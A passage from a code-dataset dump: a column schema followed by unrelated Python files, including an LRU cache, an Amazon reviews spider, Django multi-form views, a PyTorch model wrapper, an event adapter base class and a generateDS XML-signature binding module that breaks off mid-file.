blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 3
616
| content_id
stringlengths 40
40
| detected_licenses
sequencelengths 0
112
| license_type
stringclasses 2
values | repo_name
stringlengths 5
115
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringclasses 777
values | visit_date
timestamp[us]date 2015-08-06 10:31:46
2023-09-06 10:44:38
| revision_date
timestamp[us]date 1970-01-01 02:38:32
2037-05-03 13:00:00
| committer_date
timestamp[us]date 1970-01-01 02:38:32
2023-09-06 01:08:06
| github_id
int64 4.92k
681M
⌀ | star_events_count
int64 0
209k
| fork_events_count
int64 0
110k
| gha_license_id
stringclasses 22
values | gha_event_created_at
timestamp[us]date 2012-06-04 01:52:49
2023-09-14 21:59:50
⌀ | gha_created_at
timestamp[us]date 2008-05-22 07:58:19
2023-08-21 12:35:19
⌀ | gha_language
stringclasses 149
values | src_encoding
stringclasses 26
values | language
stringclasses 1
value | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 3
10.2M
| extension
stringclasses 188
values | content
stringlengths 3
10.2M
| authors
sequencelengths 1
1
| author_id
stringlengths 1
132
|
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
aaed72c4c34418066429eb2c96fbe9b95606cdb3 | de358ba57518d65393c810da20c53e1c41494bff | /LRUcache.py | 49f000a37b16c4cd24efb3415b3888324acb43b6 | [] | no_license | avirupdandapat/ALGOPROJECT | 43eef94b13e38452cdc6a506b17b6fee581a07e1 | 55b60a0c6e51cae900e243505f6a4557ad4d7069 | refs/heads/master | 2022-12-29T13:02:54.655976 | 2020-10-18T12:23:57 | 2020-10-18T12:23:57 | 305,095,375 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 878 | py | from collections import deque
class LRUCache:
    """Least-recently-used cache built from a dict plus a deque.

    The dict (``dic``) holds key -> value; the deque (``q``) records usage
    order with the most-recently-used key at the left end, so eviction
    pops from the right.
    """

    # @param capacity, an integer
    def __init__(self, capacity):
        self.capacity = capacity  # maximum number of entries retained
        self.dic = {}             # key -> value storage
        self.q = deque()          # usage order, most recent on the left

    # @return an integer
    def get(self, key):
        """Return the value for ``key`` (promoting it to most recent), or -1."""
        if key not in self.dic:
            return -1
        # Promote the key to the most-recently-used position.
        self.q.remove(key)
        self.q.appendleft(key)
        return self.dic[key]

    # @param key, an integer
    # @param value, an integer
    # @return nothing
    def set(self, key, value):
        """Insert or update ``key``, evicting the LRU entry when full."""
        if key in self.dic:
            self.q.remove(key)
        elif len(self.dic) == self.capacity:
            # Cache is full: drop the least-recently-used key (right end).
            evicted = self.q.pop()
            del self.dic[evicted]
        self.q.appendleft(key)
        self.dic[key] = value
if __name__ == '__main__':
    # Smoke test: fill a capacity-2 cache, print one lookup, touch two keys.
    cache = LRUCache(2)
    cache.set(1, 10)
    cache.set(5, 12)
    print(cache.get(5))
    cache.get(5)
    cache.get(1)
| [
"[email protected]"
] | |
da45f7852916d35f50bd49f037a7b3edd42a3e21 | 68d38b305b81e0216fa9f6769fe47e34784c77f2 | /alascrapy/spiders/amazon_uk_reviews.py | 15695e7d86cb23644a4dfb659ed43372c84943c0 | [] | no_license | ADJet1437/ScrapyProject | 2a6ed472c7c331e31eaecff26f9b38b283ffe9c2 | db52844411f6dac1e8bd113cc32a814bd2ea3632 | refs/heads/master | 2022-11-10T05:02:54.871344 | 2020-02-06T08:01:17 | 2020-02-06T08:01:17 | 237,448,562 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 396 | py | __author__ = 'leonardo'
from alascrapy.spiders.base_spiders.amazon import AmazonReviewsSpider
class AmazonUkReviewsSpider(AmazonReviewsSpider):
    """Scrapy spider for Amazon UK product reviews.

    All crawling logic lives in AmazonReviewsSpider; this subclass only
    supplies the UK-specific configuration values below.
    """
    name = 'amazon_uk_reviews'
    # Review-listing URL template; %s is filled with the product id, newest first.
    start_url_format = "https://www.amazon.co.uk/product-reviews/%s/ref=cm_cr_dp_see_all_btm?ie=UTF8&showViewpoints=1&sortBy=recent"
    # Review dates appear as e.g. "on 12 January 2020".
    date_format = 'on %d %B %Y'
    amazon_kind = 'amazon_uk_id'  # id kind recorded for UK products
    language = 'en'
"[email protected]"
] | |
4d1dc1f084686e22f9f832a79dae3c1d0d56dc01 | 43fe6a9d6875f7524204177a3a68229059133789 | /social/account/multiforms.py | 844065a4370c0da415a5df2b271ab382d43f2db9 | [
"MIT"
] | permissive | MiKueen/Social-Network | a011836805ad45228b0031ed1883526b0af02920 | 0b872860f08c3ec6f48a53160128af28787737c7 | refs/heads/master | 2023-04-17T15:33:13.212550 | 2019-07-13T04:40:54 | 2019-07-13T04:40:54 | 196,678,685 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,182 | py | from django.views.generic.base import ContextMixin, TemplateResponseMixin
from django.views.generic.edit import ProcessFormView
from django.http import HttpResponseForbidden, HttpResponseRedirect
class MultiFormMixin(ContextMixin):
    """Mixin that manages several forms on a single view.

    Each form is registered in ``form_classes`` under a short name; that
    name round-trips through the submitted data (the ``action`` field,
    seeded via the default initial data) so the POST handler knows which
    form was submitted.
    """
    form_classes = {}   # name -> form class
    prefixes = {}       # name -> form prefix (optional per-form override)
    success_urls = {}   # name -> success URL (optional per-form override)
    initial = {}
    prefix = None       # fallback prefix when prefixes has no entry
    success_url = None  # fallback success URL

    def get_form_classes(self):
        return self.form_classes

    def get_forms(self, form_classes):
        # Instantiate every registered form, keyed by its name.
        return dict([(key, self._create_form(key, class_name)) \
            for key, class_name in form_classes.items()])

    def get_form_kwargs(self, form_name):
        """Build constructor kwargs for one form; bind request data on POST/PUT."""
        kwargs = {}
        kwargs.update({'initial':self.get_initial(form_name)})
        kwargs.update({'prefix':self.get_prefix(form_name)})
        if self.request.method in ('POST', 'PUT'):
            kwargs.update({
                'data': self.request.POST,
                'files': self.request.FILES,
            })
        return kwargs

    def forms_valid(self, forms, form_name):
        # Delegate to a per-form hook (<name>_form_valid) when the view
        # defines one; otherwise redirect to that form's success URL.
        form_valid_method = '%s_form_valid' % form_name
        if hasattr(self, form_valid_method):
            return getattr(self, form_valid_method)(forms[form_name])
        else:
            # NOTE(review): HttpResponseRedirect is not imported at the top
            # of this module as written -- this branch raises NameError
            # until the import is added; confirm.
            return HttpResponseRedirect(self.get_success_url(form_name))

    def forms_invalid(self, forms):
        # Re-render with all forms so bound errors are displayed.
        return self.render_to_response(self.get_context_data(forms=forms))

    def get_initial(self, form_name):
        # Per-form hook get_<name>_initial may supply initial data; the
        # default stores the form name in the 'action' field.
        initial_method = 'get_%s_initial' % form_name
        if hasattr(self, initial_method):
            return getattr(self, initial_method)()
        else:
            return {'action': form_name}

    def get_prefix(self, form_name):
        return self.prefixes.get(form_name, self.prefix)

    def get_success_url(self, form_name=None):
        return self.success_urls.get(form_name, self.success_url)

    def _create_form(self, form_name, form_class):
        # Instantiate a single form with its computed kwargs.
        form_kwargs = self.get_form_kwargs(form_name)
        form = form_class(**form_kwargs)
        return form
class ProcessMultipleFormsView(ProcessFormView):
    """GET/POST handling for views built on MultiFormMixin."""

    def get(self, request, *args, **kwargs):
        # Render every registered form, unbound.
        form_classes = self.get_form_classes()
        forms = self.get_forms(form_classes)
        return self.render_to_response(self.get_context_data(forms=forms))

    def post(self, request, *args, **kwargs):
        # The submitted form identifies itself via the 'action' POST field.
        form_classes = self.get_form_classes()
        form_name = request.POST.get('action')
        return self._process_individual_form(form_name, form_classes)

    def _process_individual_form(self, form_name, form_classes):
        # Validate only the submitted form; unknown/missing names -> 403.
        forms = self.get_forms(form_classes)
        form = forms.get(form_name)
        if not form:
            return HttpResponseForbidden()
        elif form.is_valid():
            return self.forms_valid(forms, form_name)
        else:
            return self.forms_invalid(forms)
class BaseMultipleFormsView(MultiFormMixin, ProcessMultipleFormsView):
    """
    A base view for displaying several forms.

    Combines the form plumbing of MultiFormMixin with the GET/POST
    dispatch of ProcessMultipleFormsView; subclasses add rendering.
    """
class MultiFormsView(TemplateResponseMixin, BaseMultipleFormsView):
    """
    A view for displaying several forms, and rendering a template response.
    """
"[email protected]"
] | |
fd975001732ca43e6a45cbcefd0a09a0cf1fd7fa | a37963de31a67c214680d80d9ee3ce4611d28587 | /mrl/modules/model.py | 8f93b82dcc75932df0c875e7910016d0b4a2814d | [
"MIT"
] | permissive | jingweiz/mrl | c4c614877760953b246125688e7df96f9081fc4e | c94ab1685aea85b0d328199adefca543227875af | refs/heads/master | 2022-11-12T01:36:05.354935 | 2020-07-10T23:32:38 | 2020-07-10T23:32:38 | 279,804,300 | 0 | 1 | MIT | 2020-07-15T07:56:50 | 2020-07-15T07:56:49 | null | UTF-8 | Python | false | false | 1,448 | py | import mrl
import torch
from typing import Callable
import os
import pickle
import dill
class PytorchModel(mrl.Module):
    """
    Generic wrapper for a pytorch nn.Module (e.g., the actorcritic network).
    These live outside of the learning algorithm modules so that they can easily be
    shared by different modules (e.g., critic can be used by intrinsic curiosity module).
    They are also saved independently of the agent module (which is stateless).
    """

    def __init__(self, name: str, model_fn: Callable):
        # model_fn is a zero-argument factory so the network can be rebuilt.
        super().__init__(name, required_agent_modules=[], locals=locals())
        self.model_fn = model_fn
        self.model = self.model_fn()

    def _setup(self):
        # Move the network to the configured device, when one is set.
        if self.config.get('device'):
            self.model = self.model.to(self.config.device)

    def save(self, save_folder: str):
        """Persist the network weights as <module_name>.pt under save_folder."""
        path = os.path.join(save_folder, self.module_name + '.pt')
        torch.save(self.model.state_dict(), path)

    def load(self, save_folder: str):
        """Restore weights saved by save(); extra/missing keys are tolerated."""
        path = os.path.join(save_folder, self.module_name + '.pt')
        self.model.load_state_dict(torch.load(path), strict=False)

    def copy(self, new_name):
        """Makes a copy of the Model; e.g., for target networks"""
        # dill round-trip deep-copies the network, weights included.
        new_model = dill.loads(dill.dumps(self.model))
        model_fn = lambda: new_model
        return self.__class__(new_name, model_fn)

    def __call__(self, *args, **kwargs):
        # Mirror the wrapping module's train/eval state onto the network
        # before delegating the forward pass.
        if self.training:
            self.model.train()
        else:
            self.model.eval()
        return self.model(*args, **kwargs)
"[email protected]"
] | |
0c3976214f8e28555d2e3ff9dd37ab37dd2c712b | 251e4de91841fc42959e89211d3501ce24c4435e | /eventdriven/adapter/base.py | 253f683289151bfeaaceae339ac6fba3956f10e6 | [
"Apache-2.0"
] | permissive | ZSAIm/EventDriven | df1251c4e9f3f382600159d6626a6c959670c438 | 92bed2b3cde9249724f9cc25f3d19470abda5b9b | refs/heads/master | 2020-12-07T17:04:32.511933 | 2020-02-20T07:51:18 | 2020-02-20T07:51:18 | 232,758,430 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,767 | py | # -*- coding: UTF-8 -*-
from abc import ABC
class AbstractAdapter(ABC):
    """Base class for controller adapters: lifecycle hooks plus mappings.

    (Docstrings translated from the original Chinese.)
    """

    def __setup__(self, parent, name, **options):
        """Called during adapter installation to initialize the instance."""
        self._parent = parent
        self._instance_name = name
        self._options = options

    def __name__(self):
        """Return the adapter instance name."""
        return self._instance_name

    def __patch__(self):
        """Called after __setup__ to patch the controller."""
        pass

    def __running__(self):
        """Controller is starting (before its thread starts)."""
        pass

    def __run__(self):
        """Called after the controller has started."""
        pass

    def __closing__(self):
        """Called after the controller raises a close event."""
        pass

    def __closed__(self):
        """Called after the controller's event loop has closed."""
        pass

    def __exception__(self, error):
        """Called when the controller's event handling raises an exception."""
        pass

    def __suspend__(self):
        """Called after the controller raises a suspend event."""
        pass

    def __resume__(self):
        """Called after the controller raises a resume-from-suspend event."""
        pass

    def __mapping__(self):
        """Return extra event-handler mappings to register."""
        return {}

    def __context__(self):
        """Return global dynamic context entries to add."""
        return {}

    def __static__(self):
        """Return static context entries to add."""
        return {}

    @staticmethod
    def __unique__():
        """Return whether only a single instance may be installed."""
        return False

    @staticmethod
    def __dependencies__():
        """Return the adapter's dependency list."""
        return []
| [
"[email protected]"
] | |
7075b62d95d63c0abfdebcac5772e9ce9fff30f4 | 02b460257be33634a5e204c12a22d396c49ec1e8 | /ch1/ex1_6.py | e506176ded89c2a72f238158685c3fe6189a0731 | [] | no_license | wxhheian/ptcb | c5250362d5ab0903498e52c5a5d9cbdccc37853f | ae95fb18853f94246b4b1e84371e3f140677c8e8 | refs/heads/master | 2020-07-02T08:28:16.867948 | 2019-08-09T18:49:50 | 2019-08-09T18:49:50 | 201,473,507 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 466 | py | ##实现一个键对应多个值的字典
#####实现方法一:将多个值放到不同的容器中
# d = {
# 'a':[1,2,3],
# 'b':[4,5]
# }
# e = {
# 'a':{1,2,3},
# 'b':{4,5}
# }
from collections import defaultdict
d = defaultdict(list)
d['a'].append(1)
d['b'].append(2)
d['b'].append(4)
e = defaultdict(set)
e['a'].add(1)
e['a'].add(2)
e['b'].add(4)
################setdefault
f={}
f.setdefault('a',[]).append(1)
f.setdefault('a',[]).append(2)
| [
"[email protected]"
] | |
e96e099b25cfb3fc367f85f23be963095437e653 | a9fc496e0724866093dbb9cba70a8fdce12b67a9 | /scripts/quest/q5523e.py | 65c50af387328753c10ae50e98802bd1ea180dff | [
"MIT"
] | permissive | ryantpayton/Swordie | b2cd6b605f7f08f725f5e35d23ba3c22ef2ae7c0 | ca6f42dd43f63b1d2e6bb5cdc8fc051c277f326e | refs/heads/master | 2022-12-01T09:46:47.138072 | 2020-03-24T10:32:20 | 2020-03-24T10:32:20 | 253,997,319 | 2 | 0 | MIT | 2022-11-24T08:17:54 | 2020-04-08T05:50:22 | Java | UTF-8 | Python | false | false | 105 | py | # Tot's reward lv 60
# sm is the script manager injected by the quest-script runtime.
sm.completeQuest(5523)
# Lv. 60 Equipment box
sm.giveItem(2433958, 1)
# Release the script manager so the client is no longer locked in the dialog.
sm.dispose()
| [
"[email protected]"
] | |
ec909014a75777f9c98e33e6bfc8a8965ec22fec | 4448001f31d1f7a56915c620d7a8a12a137b29a2 | /PySpedNFSe/pysped_nfse/rj/xmldsig-core-schema_v01.py | 631217de4b952bfb536cc2c467ca6018907958bf | [] | no_license | DITIntl/lets-keep-open | c7d639a0de9f1fc4778864e74a304ef6facf7506 | 61a6b5b9500b4d4da1799099995176b594a27fb7 | refs/heads/master | 2021-09-07T20:32:46.587547 | 2018-02-28T16:37:56 | 2018-02-28T16:37:56 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 168,964 | py | # -*- coding: utf-8 -*-
# © 2016 Danimar Ribeiro, Trustcode
# License AGPL-3.0 or later (http://www.gnu.org/licenses/agpl.html).
import sys
import getopt
import re as re_
import base64
import datetime as datetime_
etree_ = None
Verbose_import_ = False
(
XMLParser_import_none, XMLParser_import_lxml,
XMLParser_import_elementtree
) = range(3)
XMLParser_import_library = None
try:
# lxml
from lxml import etree as etree_
XMLParser_import_library = XMLParser_import_lxml
if Verbose_import_:
print("running with lxml.etree")
except ImportError:
try:
# cElementTree from Python 2.5+
import xml.etree.cElementTree as etree_
XMLParser_import_library = XMLParser_import_elementtree
if Verbose_import_:
print("running with cElementTree on Python 2.5+")
except ImportError:
try:
# ElementTree from Python 2.5+
import xml.etree.ElementTree as etree_
XMLParser_import_library = XMLParser_import_elementtree
if Verbose_import_:
print("running with ElementTree on Python 2.5+")
except ImportError:
try:
# normal cElementTree install
import cElementTree as etree_
XMLParser_import_library = XMLParser_import_elementtree
if Verbose_import_:
print("running with cElementTree")
except ImportError:
try:
# normal ElementTree install
import elementtree.ElementTree as etree_
XMLParser_import_library = XMLParser_import_elementtree
if Verbose_import_:
print("running with ElementTree")
except ImportError:
raise ImportError(
"Failed to import ElementTree from any known place")
def parsexml_(*args, **kwargs):
    """Parse an XML document via whichever etree backend was imported,
    preferring lxml's ElementTree-compatible parser when available."""
    if (XMLParser_import_library == XMLParser_import_lxml and
            'parser' not in kwargs):
        # Use the lxml ElementTree compatible parser so that, e.g.,
        # we ignore comments.
        kwargs['parser'] = etree_.ETCompatXMLParser()
    doc = etree_.parse(*args, **kwargs)
    return doc
#
# User methods
#
# Calls to the methods in these classes are generated by generateDS.py.
# You can replace these methods by re-implementing the following class
# in a module named generatedssuper.py.
try:
from generatedssuper import GeneratedsSuper
except ImportError, exp:
class GeneratedsSuper(object):
tzoff_pattern = re_.compile(r'(\+|-)((0\d|1[0-3]):[0-5]\d|14:00)$')
class _FixedOffsetTZ(datetime_.tzinfo):
def __init__(self, offset, name):
self.__offset = datetime_.timedelta(minutes=offset)
self.__name = name
def utcoffset(self, dt):
return self.__offset
def tzname(self, dt):
return self.__name
def dst(self, dt):
return None
def gds_format_string(self, input_data, input_name=''):
return input_data
def gds_validate_string(self, input_data, node, input_name=''):
return input_data
def gds_format_base64(self, input_data, input_name=''):
return base64.b64encode(input_data)
def gds_validate_base64(self, input_data, node, input_name=''):
return input_data
def gds_format_integer(self, input_data, input_name=''):
return '%d' % input_data
def gds_validate_integer(self, input_data, node, input_name=''):
return input_data
def gds_format_integer_list(self, input_data, input_name=''):
return '%s' % input_data
def gds_validate_integer_list(self, input_data, node, input_name=''):
values = input_data.split()
for value in values:
try:
float(value)
except (TypeError, ValueError):
raise_parse_error(node, 'Requires sequence of integers')
return input_data
def gds_format_float(self, input_data, input_name=''):
return ('%.15f' % input_data).rstrip('0')
def gds_validate_float(self, input_data, node, input_name=''):
return input_data
def gds_format_float_list(self, input_data, input_name=''):
return '%s' % input_data
def gds_validate_float_list(self, input_data, node, input_name=''):
values = input_data.split()
for value in values:
try:
float(value)
except (TypeError, ValueError):
raise_parse_error(node, 'Requires sequence of floats')
return input_data
def gds_format_double(self, input_data, input_name=''):
return '%e' % input_data
def gds_validate_double(self, input_data, node, input_name=''):
return input_data
def gds_format_double_list(self, input_data, input_name=''):
return '%s' % input_data
def gds_validate_double_list(self, input_data, node, input_name=''):
values = input_data.split()
for value in values:
try:
float(value)
except (TypeError, ValueError):
raise_parse_error(node, 'Requires sequence of doubles')
return input_data
def gds_format_boolean(self, input_data, input_name=''):
return ('%s' % input_data).lower()
def gds_validate_boolean(self, input_data, node, input_name=''):
return input_data
def gds_format_boolean_list(self, input_data, input_name=''):
return '%s' % input_data
def gds_validate_boolean_list(self, input_data, node, input_name=''):
values = input_data.split()
for value in values:
if value not in ('true', '1', 'false', '0', ):
raise_parse_error(
node,
'Requires sequence of booleans '
'("true", "1", "false", "0")')
return input_data
def gds_validate_datetime(self, input_data, node, input_name=''):
return input_data
def gds_format_datetime(self, input_data, input_name=''):
if input_data.microsecond == 0:
_svalue = '%04d-%02d-%02dT%02d:%02d:%02d' % (
input_data.year,
input_data.month,
input_data.day,
input_data.hour,
input_data.minute,
input_data.second,
)
else:
_svalue = '%04d-%02d-%02dT%02d:%02d:%02d.%s' % (
input_data.year,
input_data.month,
input_data.day,
input_data.hour,
input_data.minute,
input_data.second,
('%f' % (float(input_data.microsecond) / 1000000))[2:],
)
if input_data.tzinfo is not None:
tzoff = input_data.tzinfo.utcoffset(input_data)
if tzoff is not None:
total_seconds = tzoff.seconds + (86400 * tzoff.days)
if total_seconds == 0:
_svalue += 'Z'
else:
if total_seconds < 0:
_svalue += '-'
total_seconds *= -1
else:
_svalue += '+'
hours = total_seconds // 3600
minutes = (total_seconds - (hours * 3600)) // 60
_svalue += '{0:02d}:{1:02d}'.format(hours, minutes)
return _svalue
@classmethod
def gds_parse_datetime(cls, input_data):
tz = None
if input_data[-1] == 'Z':
tz = GeneratedsSuper._FixedOffsetTZ(0, 'UTC')
input_data = input_data[:-1]
else:
results = GeneratedsSuper.tzoff_pattern.search(input_data)
if results is not None:
tzoff_parts = results.group(2).split(':')
tzoff = int(tzoff_parts[0]) * 60 + int(tzoff_parts[1])
if results.group(1) == '-':
tzoff *= -1
tz = GeneratedsSuper._FixedOffsetTZ(
tzoff, results.group(0))
input_data = input_data[:-6]
if len(input_data.split('.')) > 1:
dt = datetime_.datetime.strptime(
input_data, '%Y-%m-%dT%H:%M:%S.%f')
else:
dt = datetime_.datetime.strptime(
input_data, '%Y-%m-%dT%H:%M:%S')
dt = dt.replace(tzinfo=tz)
return dt
def gds_validate_date(self, input_data, node, input_name=''):
return input_data
def gds_format_date(self, input_data, input_name=''):
_svalue = '%04d-%02d-%02d' % (
input_data.year,
input_data.month,
input_data.day,
)
try:
if input_data.tzinfo is not None:
tzoff = input_data.tzinfo.utcoffset(input_data)
if tzoff is not None:
total_seconds = tzoff.seconds + (86400 * tzoff.days)
if total_seconds == 0:
_svalue += 'Z'
else:
if total_seconds < 0:
_svalue += '-'
total_seconds *= -1
else:
_svalue += '+'
hours = total_seconds // 3600
minutes = (total_seconds - (hours * 3600)) // 60
_svalue += '{0:02d}:{1:02d}'.format(hours, minutes)
except AttributeError:
pass
return _svalue
@classmethod
def gds_parse_date(cls, input_data):
tz = None
if input_data[-1] == 'Z':
tz = GeneratedsSuper._FixedOffsetTZ(0, 'UTC')
input_data = input_data[:-1]
else:
results = GeneratedsSuper.tzoff_pattern.search(input_data)
if results is not None:
tzoff_parts = results.group(2).split(':')
tzoff = int(tzoff_parts[0]) * 60 + int(tzoff_parts[1])
if results.group(1) == '-':
tzoff *= -1
tz = GeneratedsSuper._FixedOffsetTZ(
tzoff, results.group(0))
input_data = input_data[:-6]
dt = datetime_.datetime.strptime(input_data, '%Y-%m-%d')
dt = dt.replace(tzinfo=tz)
return dt.date()
def gds_validate_time(self, input_data, node, input_name=''):
return input_data
def gds_format_time(self, input_data, input_name=''):
if input_data.microsecond == 0:
_svalue = '%02d:%02d:%02d' % (
input_data.hour,
input_data.minute,
input_data.second,
)
else:
_svalue = '%02d:%02d:%02d.%s' % (
input_data.hour,
input_data.minute,
input_data.second,
('%f' % (float(input_data.microsecond) / 1000000))[2:],
)
if input_data.tzinfo is not None:
tzoff = input_data.tzinfo.utcoffset(input_data)
if tzoff is not None:
total_seconds = tzoff.seconds + (86400 * tzoff.days)
if total_seconds == 0:
_svalue += 'Z'
else:
if total_seconds < 0:
_svalue += '-'
total_seconds *= -1
else:
_svalue += '+'
hours = total_seconds // 3600
minutes = (total_seconds - (hours * 3600)) // 60
_svalue += '{0:02d}:{1:02d}'.format(hours, minutes)
return _svalue
@classmethod
def gds_parse_time(cls, input_data):
tz = None
if input_data[-1] == 'Z':
tz = GeneratedsSuper._FixedOffsetTZ(0, 'UTC')
input_data = input_data[:-1]
else:
results = GeneratedsSuper.tzoff_pattern.search(input_data)
if results is not None:
tzoff_parts = results.group(2).split(':')
tzoff = int(tzoff_parts[0]) * 60 + int(tzoff_parts[1])
if results.group(1) == '-':
tzoff *= -1
tz = GeneratedsSuper._FixedOffsetTZ(
tzoff, results.group(0))
input_data = input_data[:-6]
if len(input_data.split('.')) > 1:
dt = datetime_.datetime.strptime(input_data, '%H:%M:%S.%f')
else:
dt = datetime_.datetime.strptime(input_data, '%H:%M:%S')
dt = dt.replace(tzinfo=tz)
return dt.time()
def gds_str_lower(self, instring):
return instring.lower()
def get_path_(self, node):
path_list = []
self.get_path_list_(node, path_list)
path_list.reverse()
path = '/'.join(path_list)
return path
Tag_strip_pattern_ = re_.compile(r'\{.*\}')
def get_path_list_(self, node, path_list):
if node is None:
return
tag = GeneratedsSuper.Tag_strip_pattern_.sub('', node.tag)
if tag:
path_list.append(tag)
self.get_path_list_(node.getparent(), path_list)
def get_class_obj_(self, node, default_class=None):
class_obj1 = default_class
if 'xsi' in node.nsmap:
classname = node.get('{%s}type' % node.nsmap['xsi'])
if classname is not None:
names = classname.split(':')
if len(names) == 2:
classname = names[1]
class_obj2 = globals().get(classname)
if class_obj2 is not None:
class_obj1 = class_obj2
return class_obj1
def gds_build_any(self, node, type_name=None):
return None
@classmethod
def gds_reverse_node_mapping(cls, mapping):
return dict(((v, k) for k, v in mapping.iteritems()))
#
# If you have installed IPython you can uncomment and use the following.
# IPython is available from http://ipython.scipy.org/.
#
## from IPython.Shell import IPShellEmbed
## args = ''
## ipshell = IPShellEmbed(args,
## banner = 'Dropping into IPython',
## exit_msg = 'Leaving Interpreter, back to program.')
# Then use the following line where and when you want to drop into the
# IPython shell:
# ipshell('<some message> -- Entering ipshell.\nHit Ctrl-D to exit')
#
# Globals
#
ExternalEncoding = 'ascii'
Tag_pattern_ = re_.compile(r'({.*})?(.*)')
String_cleanup_pat_ = re_.compile(r"[\n\r\s]+")
Namespace_extract_pat_ = re_.compile(r'{(.*)}(.*)')
#
# Support/utility functions.
#
def showIndent(outfile, level, pretty_print=True):
    """Write `level` levels of 4-space indentation to outfile when pretty-printing."""
    if not pretty_print:
        return
    outfile.write('    ' * level)
def quote_xml(inStr):
    """Escape inStr for use as XML element text.

    Replaces the XML-significant characters with their predefined
    entities; '&' must be handled first so the other entities are not
    double-escaped.  Non-string inputs are stringified via %s; a falsy
    input yields ''.  (Accepts str/unicode -- Python 2 module.)
    """
    # BUG FIX: the escapes had degraded into no-op self-replacements
    # (e.g. replace('&', '&')); restore the proper XML entities.
    if not inStr:
        return ''
    s1 = (isinstance(inStr, basestring) and inStr or
          '%s' % inStr)
    s1 = s1.replace('&', '&amp;')
    s1 = s1.replace('<', '&lt;')
    s1 = s1.replace('>', '&gt;')
    return s1
def quote_attrib(inStr):
    """Escape inStr and wrap it in quotes for use as an XML attribute value.

    &, < and > become entities; the surrounding quote character is chosen
    to avoid conflicting with quotes inside the value, falling back to
    escaping '\"' as &quot; when both quote kinds are present.
    (Accepts str/unicode -- Python 2 module.)
    """
    # BUG FIX: the entity replacements had degraded into no-ops and the
    # &quot; escape was lost entirely; restore the standard behavior.
    s1 = (isinstance(inStr, basestring) and inStr or
          '%s' % inStr)
    s1 = s1.replace('&', '&amp;')
    s1 = s1.replace('<', '&lt;')
    s1 = s1.replace('>', '&gt;')
    if '"' in s1:
        if "'" in s1:
            # Both quote kinds present: escape double quotes as entities.
            s1 = '"%s"' % s1.replace('"', '&quot;')
        else:
            s1 = "'%s'" % s1
    else:
        s1 = '"%s"' % s1
    return s1
def quote_python(inStr):
    """Wrap inStr in Python string-literal quotes, escaping when needed."""
    text = inStr
    if "'" not in text:
        # No single quotes: single-quoted literal (triple-quoted if multi-line).
        return ("'''%s'''" if '\n' in text else "'%s'") % text
    # Contains single quotes: use a double-quoted literal instead,
    # backslash-escaping any embedded double quotes.
    if '"' in text:
        text = text.replace('"', '\\"')
    return ('"""%s"""' if '\n' in text else '"%s"') % text
def get_all_text_(node):
    """Concatenate node.text with the tail text of every child element."""
    pieces = [node.text] if node.text is not None else []
    pieces.extend(child.tail for child in node if child.tail is not None)
    return ''.join(pieces)
def find_attr_value_(attr_name, node):
    """Look up an attribute on node, resolving 'prefix:name' forms.

    A prefixed name is translated through node.nsmap (lxml-specific) into
    the '{namespace}name' key used by etree attributes.  Returns None when
    the attribute is absent or the prefix is unknown.
    """
    attrs = node.attrib
    attr_parts = attr_name.split(':')
    value = None
    if len(attr_parts) == 1:
        # Unprefixed attribute: direct lookup.
        value = attrs.get(attr_name)
    elif len(attr_parts) == 2:
        prefix, name = attr_parts
        namespace = node.nsmap.get(prefix)
        if namespace is not None:
            value = attrs.get('{%s}%s' % (namespace, name, ))
    return value
class GDSParseError(Exception):
    """Raised when the parsed XML does not match the expected schema."""
    pass
def raise_parse_error(node, msg):
    """Raise GDSParseError for node; lxml builds can include the source line."""
    if XMLParser_import_library == XMLParser_import_lxml:
        # lxml elements carry their source line number.
        msg = '%s (element %s/line %d)' % (
            msg, node.tag, node.sourceline, )
    else:
        msg = '%s (element %s)' % (msg, node.tag, )
    raise GDSParseError(msg)
class MixedContainer:
    """Generated helper holding one piece of mixed XML content.

    Stores either raw text, a typed scalar, or a nested complex object
    (selected by ``category``) together with enough metadata
    (``content_type``, ``name``) to re-serialize it.
    """
    # Constants for category:
    CategoryNone = 0
    CategoryText = 1
    CategorySimple = 2
    CategoryComplex = 3
    # Constants for content_type:
    TypeNone = 0
    TypeText = 1
    TypeString = 2
    TypeInteger = 3
    TypeFloat = 4
    TypeDecimal = 5
    TypeDouble = 6
    TypeBoolean = 7
    TypeBase64 = 8

    def __init__(self, category, content_type, name, value):
        self.category = category
        self.content_type = content_type
        self.name = name
        self.value = value

    def getCategory(self):
        return self.category

    def getContenttype(self, content_type):
        return self.content_type

    def getValue(self):
        return self.value

    def getName(self):
        return self.name

    def export(self, outfile, level, name, namespace, pretty_print=True):
        # Dispatch on category: raw text is written as-is, scalars are
        # wrapped in an element, complex values serialize themselves.
        if self.category == MixedContainer.CategoryText:
            # Prevent exporting empty content as empty lines.
            if self.value.strip():
                outfile.write(self.value)
        elif self.category == MixedContainer.CategorySimple:
            self.exportSimple(outfile, level, name)
        else:    # category == MixedContainer.CategoryComplex
            self.value.export(outfile, level, namespace, name, pretty_print)

    def exportSimple(self, outfile, level, name):
        # Format the scalar according to its declared content type.
        if self.content_type == MixedContainer.TypeString:
            outfile.write('<%s>%s</%s>' % (
                self.name, self.value, self.name))
        elif self.content_type == MixedContainer.TypeInteger or \
                self.content_type == MixedContainer.TypeBoolean:
            outfile.write('<%s>%d</%s>' % (
                self.name, self.value, self.name))
        elif self.content_type == MixedContainer.TypeFloat or \
                self.content_type == MixedContainer.TypeDecimal:
            outfile.write('<%s>%f</%s>' % (
                self.name, self.value, self.name))
        elif self.content_type == MixedContainer.TypeDouble:
            outfile.write('<%s>%g</%s>' % (
                self.name, self.value, self.name))
        elif self.content_type == MixedContainer.TypeBase64:
            outfile.write('<%s>%s</%s>' % (
                self.name, base64.b64encode(self.value), self.name))

    def to_etree(self, element):
        # Append this content to an ElementTree element, honoring the
        # mixed-content rules for text vs. tail placement.
        if self.category == MixedContainer.CategoryText:
            # Prevent exporting empty content as empty lines.
            if self.value.strip():
                if len(element) > 0:
